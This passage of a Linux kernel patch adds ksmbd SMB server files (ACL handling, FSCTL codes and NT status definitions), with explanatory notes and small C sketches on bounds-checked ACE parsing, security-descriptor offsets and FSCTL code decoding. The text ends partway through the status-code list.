++	posix_acl_release(fattr.cf_dacls);
++	mark_inode_dirty(inode);
++	return rc;
++}
++
++void ksmbd_init_domain(u32 *sub_auth)
++{
++	int i;
++
++	memcpy(&server_conf.domain_sid, &domain, sizeof(struct smb_sid));
++	for (i = 0; i < 3; ++i)
++		server_conf.domain_sid.sub_auth[i + 1] = cpu_to_le32(sub_auth[i]);
++}
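
The smbacl.c hunk above leans on one defensive pattern in both
smb_inherit_dacl() and smb_check_perm_dacl(): before each ACE in a
self-relative DACL is read, the remaining buffer must still hold the
fixed ACE header, and the ACE's self-declared size must not overrun
what is left; only then does the walk advance by that declared size.
A minimal user-space sketch of the same walk, with simplified
stand-in types (host-endian for brevity, not the kernel structures):

#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct ace_hdr {                /* simplified stand-in for struct smb_ace */
	uint8_t  type;
	uint8_t  flags;
	uint16_t size;          /* total size of this ACE */
	uint32_t access_req;
	/* variable-length SID follows on the wire */
};

static void walk_aces(const uint8_t *buf, size_t buf_len, unsigned int num_aces)
{
	size_t off = 0;

	for (unsigned int i = 0; i < num_aces; i++) {
		struct ace_hdr ace;

		/* the fixed header must fit in what is left */
		if (buf_len - off < sizeof(ace))
			break;
		memcpy(&ace, buf + off, sizeof(ace));

		/* the ACE's own size must be sane and fit as well */
		if (ace.size < sizeof(ace) || ace.size > buf_len - off)
			break;

		printf("ace %u: type=%u flags=0x%02x size=%u\n", i,
		       (unsigned int)ace.type, (unsigned int)ace.flags,
		       (unsigned int)ace.size);

		off += ace.size;        /* advance by the declared size */
	}
}

int main(void)
{
	uint8_t buf[20] = { 0 };
	struct ace_hdr a = { .type = 0, .flags = 0x02, .size = 16,
			     .access_req = 0x001f01ff };

	memcpy(buf, &a, sizeof(a));
	/* num_aces claims 2, but the second ACE is truncated, so the
	 * walk stops after the first instead of reading past the end */
	walk_aces(buf, sizeof(buf), 2);
	return 0;
}
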
+diff --git a/fs/smb/server/smbacl.h b/fs/smb/server/smbacl.h
+new file mode 100644
+index 0000000000000..618f2e0236b31
+--- /dev/null
++++ b/fs/smb/server/smbacl.h
+@@ -0,0 +1,238 @@
++/* SPDX-License-Identifier: LGPL-2.1+ */
++/*
++ *   Copyright (c) International Business Machines  Corp., 2007
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *   Modified by Namjae Jeon (linkinjeon@kernel.org)
++ */
++
++#ifndef _SMBACL_H
++#define _SMBACL_H
++
++#include <linux/fs.h>
++#include <linux/namei.h>
++#include <linux/posix_acl.h>
++#include <linux/mnt_idmapping.h>
++
++#include "mgmt/tree_connect.h"
++
++#define NUM_AUTHS (6)	/* number of authority fields */
++#define SID_MAX_SUB_AUTHORITIES (15) /* max number of sub authority fields */
++
++/*
++ * ACE types - see MS-DTYP 2.4.4.1
++ */
++enum {
++	ACCESS_ALLOWED,
++	ACCESS_DENIED,
++};
++
++/*
++ * Security ID types
++ */
++enum {
++	SIDOWNER = 1,
++	SIDGROUP,
++	SIDCREATOR_OWNER,
++	SIDCREATOR_GROUP,
++	SIDUNIX_USER,
++	SIDUNIX_GROUP,
++	SIDNFS_USER,
++	SIDNFS_GROUP,
++	SIDNFS_MODE,
++};
++
++/* Revision for ACLs */
++#define SD_REVISION	1
++
++/* Control flags for Security Descriptor */
++#define OWNER_DEFAULTED		0x0001
++#define GROUP_DEFAULTED		0x0002
++#define DACL_PRESENT		0x0004
++#define DACL_DEFAULTED		0x0008
++#define SACL_PRESENT		0x0010
++#define SACL_DEFAULTED		0x0020
++#define DACL_TRUSTED		0x0040
++#define SERVER_SECURITY		0x0080
++#define DACL_AUTO_INHERIT_REQ	0x0100
++#define SACL_AUTO_INHERIT_REQ	0x0200
++#define DACL_AUTO_INHERITED	0x0400
++#define SACL_AUTO_INHERITED	0x0800
++#define DACL_PROTECTED		0x1000
++#define SACL_PROTECTED		0x2000
++#define RM_CONTROL_VALID	0x4000
++#define SELF_RELATIVE		0x8000
++
++/* ACE types - see MS-DTYP 2.4.4.1 */
++#define ACCESS_ALLOWED_ACE_TYPE 0x00
++#define ACCESS_DENIED_ACE_TYPE  0x01
++#define SYSTEM_AUDIT_ACE_TYPE   0x02
++#define SYSTEM_ALARM_ACE_TYPE   0x03
++#define ACCESS_ALLOWED_COMPOUND_ACE_TYPE 0x04
++#define ACCESS_ALLOWED_OBJECT_ACE_TYPE  0x05
++#define ACCESS_DENIED_OBJECT_ACE_TYPE   0x06
++#define SYSTEM_AUDIT_OBJECT_ACE_TYPE    0x07
++#define SYSTEM_ALARM_OBJECT_ACE_TYPE    0x08
++#define ACCESS_ALLOWED_CALLBACK_ACE_TYPE 0x09
++#define ACCESS_DENIED_CALLBACK_ACE_TYPE 0x0A
++#define ACCESS_ALLOWED_CALLBACK_OBJECT_ACE_TYPE 0x0B
++#define ACCESS_DENIED_CALLBACK_OBJECT_ACE_TYPE  0x0C
++#define SYSTEM_AUDIT_CALLBACK_ACE_TYPE  0x0D
++#define SYSTEM_ALARM_CALLBACK_ACE_TYPE  0x0E /* Reserved */
++#define SYSTEM_AUDIT_CALLBACK_OBJECT_ACE_TYPE 0x0F
++#define SYSTEM_ALARM_CALLBACK_OBJECT_ACE_TYPE 0x10 /* reserved */
++#define SYSTEM_MANDATORY_LABEL_ACE_TYPE 0x11
++#define SYSTEM_RESOURCE_ATTRIBUTE_ACE_TYPE 0x12
++#define SYSTEM_SCOPED_POLICY_ID_ACE_TYPE 0x13
++
++/* ACE flags */
++#define OBJECT_INHERIT_ACE		0x01
++#define CONTAINER_INHERIT_ACE		0x02
++#define NO_PROPAGATE_INHERIT_ACE	0x04
++#define INHERIT_ONLY_ACE		0x08
++#define INHERITED_ACE			0x10
++#define SUCCESSFUL_ACCESS_ACE_FLAG	0x40
++#define FAILED_ACCESS_ACE_FLAG		0x80
++
++/*
++ * Maximum size of a string representation of a SID:
++ *
++ * The fields are unsigned values in decimal. So:
++ *
++ * u8:  max 3 bytes in decimal
++ * u32: max 10 bytes in decimal
++ *
++ * "S-" + 3 bytes for version field + 15 for authority field + NULL terminator
++ *
++ * For authority field, max is when all 6 values are non-zero and it must be
++ * represented in hex. So "-0x" + 12 hex digits.
++ *
++ * Add 11 bytes for each subauthority field (10 bytes each + 1 for '-')
++ */
++#define SID_STRING_BASE_SIZE (2 + 3 + 15 + 1)
++#define SID_STRING_SUBAUTH_SIZE (11) /* size of a single subauth string */
++
++#define DOMAIN_USER_RID_LE	cpu_to_le32(513)
++
++struct ksmbd_conn;
++
++struct smb_ntsd {
++	__le16 revision; /* revision level */
++	__le16 type;
++	__le32 osidoffset;
++	__le32 gsidoffset;
++	__le32 sacloffset;
++	__le32 dacloffset;
++} __packed;
++
++struct smb_sid {
++	__u8 revision; /* revision level */
++	__u8 num_subauth;
++	__u8 authority[NUM_AUTHS];
++	__le32 sub_auth[SID_MAX_SUB_AUTHORITIES]; /* sub_auth[num_subauth] */
++} __packed;
++
++/* size of a struct cifs_sid, sans sub_auth array */
++#define CIFS_SID_BASE_SIZE (1 + 1 + NUM_AUTHS)
++
++struct smb_acl {
++	__le16 revision; /* revision level */
++	__le16 size;
++	__le32 num_aces;
++} __packed;
++
++struct smb_ace {
++	__u8 type;
++	__u8 flags;
++	__le16 size;
++	__le32 access_req;
++	struct smb_sid sid; /* ie UUID of user or group who gets these perms */
++} __packed;
++
++struct smb_fattr {
++	kuid_t	cf_uid;
++	kgid_t	cf_gid;
++	umode_t	cf_mode;
++	__le32 daccess;
++	struct posix_acl *cf_acls;
++	struct posix_acl *cf_dacls;
++};
++
++struct posix_ace_state {
++	u32 allow;
++	u32 deny;
++};
++
++struct posix_user_ace_state {
++	union {
++		kuid_t uid;
++		kgid_t gid;
++	};
++	struct posix_ace_state perms;
++};
++
++struct posix_ace_state_array {
++	int n;
++	struct posix_user_ace_state aces[];
++};
++
++/*
++ * while processing the nfsv4 ace, this maintains the partial permissions
++ * calculated so far:
++ */
++
++struct posix_acl_state {
++	struct posix_ace_state owner;
++	struct posix_ace_state group;
++	struct posix_ace_state other;
++	struct posix_ace_state everyone;
++	struct posix_ace_state mask; /* deny unused in this case */
++	struct posix_ace_state_array *users;
++	struct posix_ace_state_array *groups;
++};
++
++int parse_sec_desc(struct user_namespace *user_ns, struct smb_ntsd *pntsd,
++		   int acl_len, struct smb_fattr *fattr);
++int build_sec_desc(struct user_namespace *user_ns, struct smb_ntsd *pntsd,
++		   struct smb_ntsd *ppntsd, int ppntsd_size, int addition_info,
++		   __u32 *secdesclen, struct smb_fattr *fattr);
++int init_acl_state(struct posix_acl_state *state, int cnt);
++void free_acl_state(struct posix_acl_state *state);
++void posix_state_to_acl(struct posix_acl_state *state,
++			struct posix_acl_entry *pace);
++int compare_sids(const struct smb_sid *ctsid, const struct smb_sid *cwsid);
++bool smb_inherit_flags(int flags, bool is_dir);
++int smb_inherit_dacl(struct ksmbd_conn *conn, const struct path *path,
++		     unsigned int uid, unsigned int gid);
++int smb_check_perm_dacl(struct ksmbd_conn *conn, const struct path *path,
++			__le32 *pdaccess, int uid);
++int set_info_sec(struct ksmbd_conn *conn, struct ksmbd_tree_connect *tcon,
++		 const struct path *path, struct smb_ntsd *pntsd, int ntsd_len,
++		 bool type_check);
++void id_to_sid(unsigned int cid, uint sidtype, struct smb_sid *ssid);
++void ksmbd_init_domain(u32 *sub_auth);
++
++static inline uid_t posix_acl_uid_translate(struct user_namespace *mnt_userns,
++					    struct posix_acl_entry *pace)
++{
++	vfsuid_t vfsuid;
++
++	/* If this is an idmapped mount, apply the idmapping. */
++	vfsuid = make_vfsuid(mnt_userns, &init_user_ns, pace->e_uid);
++
++	/* Translate the kuid into a userspace id ksmbd would see. */
++	return from_kuid(&init_user_ns, vfsuid_into_kuid(vfsuid));
++}
++
++static inline gid_t posix_acl_gid_translate(struct user_namespace *mnt_userns,
++					    struct posix_acl_entry *pace)
++{
++	vfsgid_t vfsgid;
++
++	/* If this is an idmapped mount, apply the idmapping. */
++	vfsgid = make_vfsgid(mnt_userns, &init_user_ns, pace->e_gid);
++
++	/* Translate the kgid into a userspace id ksmbd would see. */
++	return from_kgid(&init_user_ns, vfsgid_into_kgid(vfsgid));
++}
++
++#endif /* _SMBACL_H */
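
The offsets in struct smb_ntsd describe a self-relative security
descriptor: osidoffset, gsidoffset and dacloffset are byte offsets
from the start of the descriptor, and a SID occupies
1 + 1 + 6 + 4 * num_subauth bytes, the same expression used when the
parent owner and group SIDs are copied in smb_inherit_dacl() above.
A worked size calculation follows, assuming a common owner SID /
group SID / DACL ordering; the format guarantees the offsets, not any
particular ordering:

#include <stdio.h>

static unsigned int sid_size(unsigned int num_subauth)
{
	/* revision + subauth count + 6 authority bytes + 32-bit subauths */
	return 1 + 1 + 6 + 4 * num_subauth;
}

int main(void)
{
	/* e.g. S-1-5-21-a-b-c-513 carries 5 sub-authorities */
	unsigned int owner = sid_size(5);            /* 28 bytes */
	unsigned int group = sid_size(5);            /* 28 bytes */
	unsigned int hdr   = 20;  /* sizeof(struct smb_ntsd): 2+2+4+4+4+4 */

	printf("osidoffset = %u\n", hdr);                    /* 20 */
	printf("gsidoffset = %u\n", hdr + owner);            /* 48 */
	printf("dacloffset = %u\n", hdr + owner + group);    /* 76 */
	return 0;
}
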
+diff --git a/fs/smb/server/smbfsctl.h b/fs/smb/server/smbfsctl.h
+new file mode 100644
+index 0000000000000..b98418aae20cd
+--- /dev/null
++++ b/fs/smb/server/smbfsctl.h
+@@ -0,0 +1,91 @@
++/* SPDX-License-Identifier: LGPL-2.1+ */
++/*
++ *   fs/cifs/smbfsctl.h: SMB, CIFS, SMB2 FSCTL definitions
++ *
++ *   Copyright (c) International Business Machines  Corp., 2002,2009
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ */
++
++/* IOCTL information */
++/*
++ * List of ioctl/fsctl function codes that are or could be useful in the
++ * future to remote clients like cifs or SMB2 client.  There is probably
++ * a slightly larger set of fsctls that NTFS local filesystem could handle,
++ * including the seven below that we do not have struct definitions for.
++ * Even with protocol definitions for most of these now available, we still
++ * need to do some experimentation to identify which are practical to do
++ * remotely.  Some of the following, such as the encryption/compression ones
++ * could be invoked from tools via a specialized hook into the VFS rather
++ * than via the standard vfs entry points
++ */
++
++#ifndef __KSMBD_SMBFSCTL_H
++#define __KSMBD_SMBFSCTL_H
++
++#define FSCTL_DFS_GET_REFERRALS      0x00060194
++#define FSCTL_DFS_GET_REFERRALS_EX   0x000601B0
++#define FSCTL_REQUEST_OPLOCK_LEVEL_1 0x00090000
++#define FSCTL_REQUEST_OPLOCK_LEVEL_2 0x00090004
++#define FSCTL_REQUEST_BATCH_OPLOCK   0x00090008
++#define FSCTL_LOCK_VOLUME            0x00090018
++#define FSCTL_UNLOCK_VOLUME          0x0009001C
++#define FSCTL_IS_PATHNAME_VALID      0x0009002C /* BB add struct */
++#define FSCTL_GET_COMPRESSION        0x0009003C /* BB add struct */
++#define FSCTL_SET_COMPRESSION        0x0009C040 /* BB add struct */
++#define FSCTL_QUERY_FAT_BPB          0x00090058 /* BB add struct */
++/* Verify the next FSCTL number, we had it as 0x00090090 before */
++#define FSCTL_FILESYSTEM_GET_STATS   0x00090060 /* BB add struct */
++#define FSCTL_GET_NTFS_VOLUME_DATA   0x00090064 /* BB add struct */
++#define FSCTL_GET_RETRIEVAL_POINTERS 0x00090073 /* BB add struct */
++#define FSCTL_IS_VOLUME_DIRTY        0x00090078 /* BB add struct */
++#define FSCTL_ALLOW_EXTENDED_DASD_IO 0x00090083 /* BB add struct */
++#define FSCTL_REQUEST_FILTER_OPLOCK  0x0009008C
++#define FSCTL_FIND_FILES_BY_SID      0x0009008F /* BB add struct */
++#define FSCTL_SET_OBJECT_ID          0x00090098 /* BB add struct */
++#define FSCTL_GET_OBJECT_ID          0x0009009C /* BB add struct */
++#define FSCTL_DELETE_OBJECT_ID       0x000900A0 /* BB add struct */
++#define FSCTL_SET_REPARSE_POINT      0x000900A4 /* BB add struct */
++#define FSCTL_GET_REPARSE_POINT      0x000900A8 /* BB add struct */
++#define FSCTL_DELETE_REPARSE_POINT   0x000900AC /* BB add struct */
++#define FSCTL_SET_OBJECT_ID_EXTENDED 0x000900BC /* BB add struct */
++#define FSCTL_CREATE_OR_GET_OBJECT_ID 0x000900C0 /* BB add struct */
++#define FSCTL_SET_SPARSE             0x000900C4 /* BB add struct */
++#define FSCTL_SET_ZERO_DATA          0x000980C8 /* BB add struct */
++#define FSCTL_SET_ENCRYPTION         0x000900D7 /* BB add struct */
++#define FSCTL_ENCRYPTION_FSCTL_IO    0x000900DB /* BB add struct */
++#define FSCTL_WRITE_RAW_ENCRYPTED    0x000900DF /* BB add struct */
++#define FSCTL_READ_RAW_ENCRYPTED     0x000900E3 /* BB add struct */
++#define FSCTL_READ_FILE_USN_DATA     0x000900EB /* BB add struct */
++#define FSCTL_WRITE_USN_CLOSE_RECORD 0x000900EF /* BB add struct */
++#define FSCTL_SIS_COPYFILE           0x00090100 /* BB add struct */
++#define FSCTL_RECALL_FILE            0x00090117 /* BB add struct */
++#define FSCTL_QUERY_SPARING_INFO     0x00090138 /* BB add struct */
++#define FSCTL_SET_ZERO_ON_DEALLOC    0x00090194 /* BB add struct */
++#define FSCTL_SET_SHORT_NAME_BEHAVIOR 0x000901B4 /* BB add struct */
++#define FSCTL_QUERY_ALLOCATED_RANGES 0x000940CF /* BB add struct */
++#define FSCTL_SET_DEFECT_MANAGEMENT  0x00098134 /* BB add struct */
++#define FSCTL_DUPLICATE_EXTENTS_TO_FILE 0x00098344
++#define FSCTL_SIS_LINK_FILES         0x0009C104
++#define FSCTL_PIPE_PEEK              0x0011400C /* BB add struct */
++#define FSCTL_PIPE_TRANSCEIVE        0x0011C017 /* BB add struct */
++/* strange that the number for this op is not sequential with previous op */
++#define FSCTL_PIPE_WAIT              0x00110018 /* BB add struct */
++#define FSCTL_REQUEST_RESUME_KEY     0x00140078
++#define FSCTL_LMR_GET_LINK_TRACK_INF 0x001400E8 /* BB add struct */
++#define FSCTL_LMR_SET_LINK_TRACK_INF 0x001400EC /* BB add struct */
++#define FSCTL_VALIDATE_NEGOTIATE_INFO 0x00140204
++#define FSCTL_QUERY_NETWORK_INTERFACE_INFO 0x001401FC
++#define FSCTL_COPYCHUNK              0x001440F2
++#define FSCTL_COPYCHUNK_WRITE        0x001480F2
++
++#define IO_REPARSE_TAG_MOUNT_POINT   0xA0000003
++#define IO_REPARSE_TAG_HSM           0xC0000004
++#define IO_REPARSE_TAG_SIS           0x80000007
++
++/* WSL reparse tags */
++#define IO_REPARSE_TAG_LX_SYMLINK_LE	cpu_to_le32(0xA000001D)
++#define IO_REPARSE_TAG_AF_UNIX_LE	cpu_to_le32(0x80000023)
++#define IO_REPARSE_TAG_LX_FIFO_LE	cpu_to_le32(0x80000024)
++#define IO_REPARSE_TAG_LX_CHR_LE	cpu_to_le32(0x80000025)
++#define IO_REPARSE_TAG_LX_BLK_LE	cpu_to_le32(0x80000026)
++#endif /* __KSMBD_SMBFSCTL_H */
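
The FSCTL numbers collected in smbfsctl.h follow the Windows CTL_CODE
packing documented in MS-FSCC: device type in bits 16-31, required
access in bits 14-15, function number in bits 2-13 and transfer
method in bits 0-1. A small decoder as a sketch; only the two sample
codes below are taken from the header above:

#include <stdint.h>
#include <stdio.h>

static void decode_fsctl(uint32_t code)
{
	printf("0x%08X: device=0x%04X access=%u function=0x%03X method=%u\n",
	       (unsigned int)code,
	       (unsigned int)(code >> 16),      /* 0x0014: network fs */
	       (unsigned int)((code >> 14) & 0x3),
	       (unsigned int)((code >> 2) & 0xFFF),
	       (unsigned int)(code & 0x3));
}

int main(void)
{
	decode_fsctl(0x00140204);    /* FSCTL_VALIDATE_NEGOTIATE_INFO */
	decode_fsctl(0x001440F2);    /* FSCTL_COPYCHUNK */
	return 0;
}

For 0x00140204 this prints device 0x0014, function 0x081 and method 0
(METHOD_BUFFERED), matching the MS-FSCC definition.
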
+diff --git a/fs/smb/server/smbstatus.h b/fs/smb/server/smbstatus.h
+new file mode 100644
+index 0000000000000..108a8b6ed24a0
+--- /dev/null
++++ b/fs/smb/server/smbstatus.h
+@@ -0,0 +1,1822 @@
++/* SPDX-License-Identifier: LGPL-2.1+ */
++/*
++ *   fs/cifs/smb2status.h
++ *
++ *   SMB2 Status code (network error) definitions
++ *   Definitions are from MS-ERREF
++ *
++ *   Copyright (c) International Business Machines  Corp., 2009,2011
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ */
++
++/*
++ *  0 1 2 3 4 5 6 7 8 9 0 A B C D E F 0 1 2 3 4 5 6 7 8 9 A B C D E F
++ *  SEV C N <-------Facility--------> <------Error Status Code------>
++ *
++ *  C is set if "customer defined" error, N bit is reserved and MBZ
++ */
++
++#define STATUS_SEVERITY_SUCCESS cpu_to_le32(0x0000)
++#define STATUS_SEVERITY_INFORMATIONAL cpu_to_le32(0x0001)
++#define STATUS_SEVERITY_WARNING cpu_to_le32(0x0002)
++#define STATUS_SEVERITY_ERROR cpu_to_le32(0x0003)
++
++struct ntstatus {
++	/* Facility is the high 12 bits of the following field */
++	__le32 Facility; /* low 2 bits Severity, next is Customer, then rsrvd */
++	__le32 Code;
++};
++
++#define STATUS_SUCCESS 0x00000000
++#define STATUS_WAIT_0 cpu_to_le32(0x00000000)
++#define STATUS_WAIT_1 cpu_to_le32(0x00000001)
++#define STATUS_WAIT_2 cpu_to_le32(0x00000002)
++#define STATUS_WAIT_3 cpu_to_le32(0x00000003)
++#define STATUS_WAIT_63 cpu_to_le32(0x0000003F)
++#define STATUS_ABANDONED cpu_to_le32(0x00000080)
++#define STATUS_ABANDONED_WAIT_0 cpu_to_le32(0x00000080)
++#define STATUS_ABANDONED_WAIT_63 cpu_to_le32(0x000000BF)
++#define STATUS_USER_APC cpu_to_le32(0x000000C0)
++#define STATUS_KERNEL_APC cpu_to_le32(0x00000100)
++#define STATUS_ALERTED cpu_to_le32(0x00000101)
++#define STATUS_TIMEOUT cpu_to_le32(0x00000102)
++#define STATUS_PENDING cpu_to_le32(0x00000103)
++#define STATUS_REPARSE cpu_to_le32(0x00000104)
++#define STATUS_MORE_ENTRIES cpu_to_le32(0x00000105)
++#define STATUS_NOT_ALL_ASSIGNED cpu_to_le32(0x00000106)
++#define STATUS_SOME_NOT_MAPPED cpu_to_le32(0x00000107)
++#define STATUS_OPLOCK_BREAK_IN_PROGRESS cpu_to_le32(0x00000108)
++#define STATUS_VOLUME_MOUNTED cpu_to_le32(0x00000109)
++#define STATUS_RXACT_COMMITTED cpu_to_le32(0x0000010A)
++#define STATUS_NOTIFY_CLEANUP cpu_to_le32(0x0000010B)
++#define STATUS_NOTIFY_ENUM_DIR cpu_to_le32(0x0000010C)
++#define STATUS_NO_QUOTAS_FOR_ACCOUNT cpu_to_le32(0x0000010D)
++#define STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED cpu_to_le32(0x0000010E)
++#define STATUS_PAGE_FAULT_TRANSITION cpu_to_le32(0x00000110)
++#define STATUS_PAGE_FAULT_DEMAND_ZERO cpu_to_le32(0x00000111)
++#define STATUS_PAGE_FAULT_COPY_ON_WRITE cpu_to_le32(0x00000112)
++#define STATUS_PAGE_FAULT_GUARD_PAGE cpu_to_le32(0x00000113)
++#define STATUS_PAGE_FAULT_PAGING_FILE cpu_to_le32(0x00000114)
++#define STATUS_CACHE_PAGE_LOCKED cpu_to_le32(0x00000115)
++#define STATUS_CRASH_DUMP cpu_to_le32(0x00000116)
++#define STATUS_BUFFER_ALL_ZEROS cpu_to_le32(0x00000117)
++#define STATUS_REPARSE_OBJECT cpu_to_le32(0x00000118)
++#define STATUS_RESOURCE_REQUIREMENTS_CHANGED cpu_to_le32(0x00000119)
++#define STATUS_TRANSLATION_COMPLETE cpu_to_le32(0x00000120)
++#define STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY cpu_to_le32(0x00000121)
++#define STATUS_NOTHING_TO_TERMINATE cpu_to_le32(0x00000122)
++#define STATUS_PROCESS_NOT_IN_JOB cpu_to_le32(0x00000123)
++#define STATUS_PROCESS_IN_JOB cpu_to_le32(0x00000124)
++#define STATUS_VOLSNAP_HIBERNATE_READY cpu_to_le32(0x00000125)
++#define STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY cpu_to_le32(0x00000126)
++#define STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED cpu_to_le32(0x00000127)
++#define STATUS_INTERRUPT_STILL_CONNECTED cpu_to_le32(0x00000128)
++#define STATUS_PROCESS_CLONED cpu_to_le32(0x00000129)
++#define STATUS_FILE_LOCKED_WITH_ONLY_READERS cpu_to_le32(0x0000012A)
++#define STATUS_FILE_LOCKED_WITH_WRITERS cpu_to_le32(0x0000012B)
++#define STATUS_RESOURCEMANAGER_READ_ONLY cpu_to_le32(0x00000202)
++#define STATUS_WAIT_FOR_OPLOCK cpu_to_le32(0x00000367)
++#define DBG_EXCEPTION_HANDLED cpu_to_le32(0x00010001)
++#define DBG_CONTINUE cpu_to_le32(0x00010002)
++#define STATUS_FLT_IO_COMPLETE cpu_to_le32(0x001C0001)
++#define STATUS_OBJECT_NAME_EXISTS cpu_to_le32(0x40000000)
++#define STATUS_THREAD_WAS_SUSPENDED cpu_to_le32(0x40000001)
++#define STATUS_WORKING_SET_LIMIT_RANGE cpu_to_le32(0x40000002)
++#define STATUS_IMAGE_NOT_AT_BASE cpu_to_le32(0x40000003)
++#define STATUS_RXACT_STATE_CREATED cpu_to_le32(0x40000004)
++#define STATUS_SEGMENT_NOTIFICATION cpu_to_le32(0x40000005)
++#define STATUS_LOCAL_USER_SESSION_KEY cpu_to_le32(0x40000006)
++#define STATUS_BAD_CURRENT_DIRECTORY cpu_to_le32(0x40000007)
++#define STATUS_SERIAL_MORE_WRITES cpu_to_le32(0x40000008)
++#define STATUS_REGISTRY_RECOVERED cpu_to_le32(0x40000009)
++#define STATUS_FT_READ_RECOVERY_FROM_BACKUP cpu_to_le32(0x4000000A)
++#define STATUS_FT_WRITE_RECOVERY cpu_to_le32(0x4000000B)
++#define STATUS_SERIAL_COUNTER_TIMEOUT cpu_to_le32(0x4000000C)
++#define STATUS_NULL_LM_PASSWORD cpu_to_le32(0x4000000D)
++#define STATUS_IMAGE_MACHINE_TYPE_MISMATCH cpu_to_le32(0x4000000E)
++#define STATUS_RECEIVE_PARTIAL cpu_to_le32(0x4000000F)
++#define STATUS_RECEIVE_EXPEDITED cpu_to_le32(0x40000010)
++#define STATUS_RECEIVE_PARTIAL_EXPEDITED cpu_to_le32(0x40000011)
++#define STATUS_EVENT_DONE cpu_to_le32(0x40000012)
++#define STATUS_EVENT_PENDING cpu_to_le32(0x40000013)
++#define STATUS_CHECKING_FILE_SYSTEM cpu_to_le32(0x40000014)
++#define STATUS_FATAL_APP_EXIT cpu_to_le32(0x40000015)
++#define STATUS_PREDEFINED_HANDLE cpu_to_le32(0x40000016)
++#define STATUS_WAS_UNLOCKED cpu_to_le32(0x40000017)
++#define STATUS_SERVICE_NOTIFICATION cpu_to_le32(0x40000018)
++#define STATUS_WAS_LOCKED cpu_to_le32(0x40000019)
++#define STATUS_LOG_HARD_ERROR cpu_to_le32(0x4000001A)
++#define STATUS_ALREADY_WIN32 cpu_to_le32(0x4000001B)
++#define STATUS_WX86_UNSIMULATE cpu_to_le32(0x4000001C)
++#define STATUS_WX86_CONTINUE cpu_to_le32(0x4000001D)
++#define STATUS_WX86_SINGLE_STEP cpu_to_le32(0x4000001E)
++#define STATUS_WX86_BREAKPOINT cpu_to_le32(0x4000001F)
++#define STATUS_WX86_EXCEPTION_CONTINUE cpu_to_le32(0x40000020)
++#define STATUS_WX86_EXCEPTION_LASTCHANCE cpu_to_le32(0x40000021)
++#define STATUS_WX86_EXCEPTION_CHAIN cpu_to_le32(0x40000022)
++#define STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE cpu_to_le32(0x40000023)
++#define STATUS_NO_YIELD_PERFORMED cpu_to_le32(0x40000024)
++#define STATUS_TIMER_RESUME_IGNORED cpu_to_le32(0x40000025)
++#define STATUS_ARBITRATION_UNHANDLED cpu_to_le32(0x40000026)
++#define STATUS_CARDBUS_NOT_SUPPORTED cpu_to_le32(0x40000027)
++#define STATUS_WX86_CREATEWX86TIB cpu_to_le32(0x40000028)
++#define STATUS_MP_PROCESSOR_MISMATCH cpu_to_le32(0x40000029)
++#define STATUS_HIBERNATED cpu_to_le32(0x4000002A)
++#define STATUS_RESUME_HIBERNATION cpu_to_le32(0x4000002B)
++#define STATUS_FIRMWARE_UPDATED cpu_to_le32(0x4000002C)
++#define STATUS_DRIVERS_LEAKING_LOCKED_PAGES cpu_to_le32(0x4000002D)
++#define STATUS_MESSAGE_RETRIEVED cpu_to_le32(0x4000002E)
++#define STATUS_SYSTEM_POWERSTATE_TRANSITION cpu_to_le32(0x4000002F)
++#define STATUS_ALPC_CHECK_COMPLETION_LIST cpu_to_le32(0x40000030)
++#define STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION cpu_to_le32(0x40000031)
++#define STATUS_ACCESS_AUDIT_BY_POLICY cpu_to_le32(0x40000032)
++#define STATUS_ABANDON_HIBERFILE cpu_to_le32(0x40000033)
++#define STATUS_BIZRULES_NOT_ENABLED cpu_to_le32(0x40000034)
++#define STATUS_WAKE_SYSTEM cpu_to_le32(0x40000294)
++#define STATUS_DS_SHUTTING_DOWN cpu_to_le32(0x40000370)
++#define DBG_REPLY_LATER cpu_to_le32(0x40010001)
++#define DBG_UNABLE_TO_PROVIDE_HANDLE cpu_to_le32(0x40010002)
++#define DBG_TERMINATE_THREAD cpu_to_le32(0x40010003)
++#define DBG_TERMINATE_PROCESS cpu_to_le32(0x40010004)
++#define DBG_CONTROL_C cpu_to_le32(0x40010005)
++#define DBG_PRINTEXCEPTION_C cpu_to_le32(0x40010006)
++#define DBG_RIPEXCEPTION cpu_to_le32(0x40010007)
++#define DBG_CONTROL_BREAK cpu_to_le32(0x40010008)
++#define DBG_COMMAND_EXCEPTION cpu_to_le32(0x40010009)
++#define RPC_NT_UUID_LOCAL_ONLY cpu_to_le32(0x40020056)
++#define RPC_NT_SEND_INCOMPLETE cpu_to_le32(0x400200AF)
++#define STATUS_CTX_CDM_CONNECT cpu_to_le32(0x400A0004)
++#define STATUS_CTX_CDM_DISCONNECT cpu_to_le32(0x400A0005)
++#define STATUS_SXS_RELEASE_ACTIVATION_CONTEXT cpu_to_le32(0x4015000D)
++#define STATUS_RECOVERY_NOT_NEEDED cpu_to_le32(0x40190034)
++#define STATUS_RM_ALREADY_STARTED cpu_to_le32(0x40190035)
++#define STATUS_LOG_NO_RESTART cpu_to_le32(0x401A000C)
++#define STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST cpu_to_le32(0x401B00EC)
++#define STATUS_GRAPHICS_PARTIAL_DATA_POPULATED cpu_to_le32(0x401E000A)
++#define STATUS_GRAPHICS_DRIVER_MISMATCH cpu_to_le32(0x401E0117)
++#define STATUS_GRAPHICS_MODE_NOT_PINNED cpu_to_le32(0x401E0307)
++#define STATUS_GRAPHICS_NO_PREFERRED_MODE cpu_to_le32(0x401E031E)
++#define STATUS_GRAPHICS_DATASET_IS_EMPTY cpu_to_le32(0x401E034B)
++#define STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET cpu_to_le32(0x401E034C)
++#define STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED	\
++	cpu_to_le32(0x401E0351)
++#define STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS cpu_to_le32(0x401E042F)
++#define STATUS_GRAPHICS_LEADLINK_START_DEFERRED cpu_to_le32(0x401E0437)
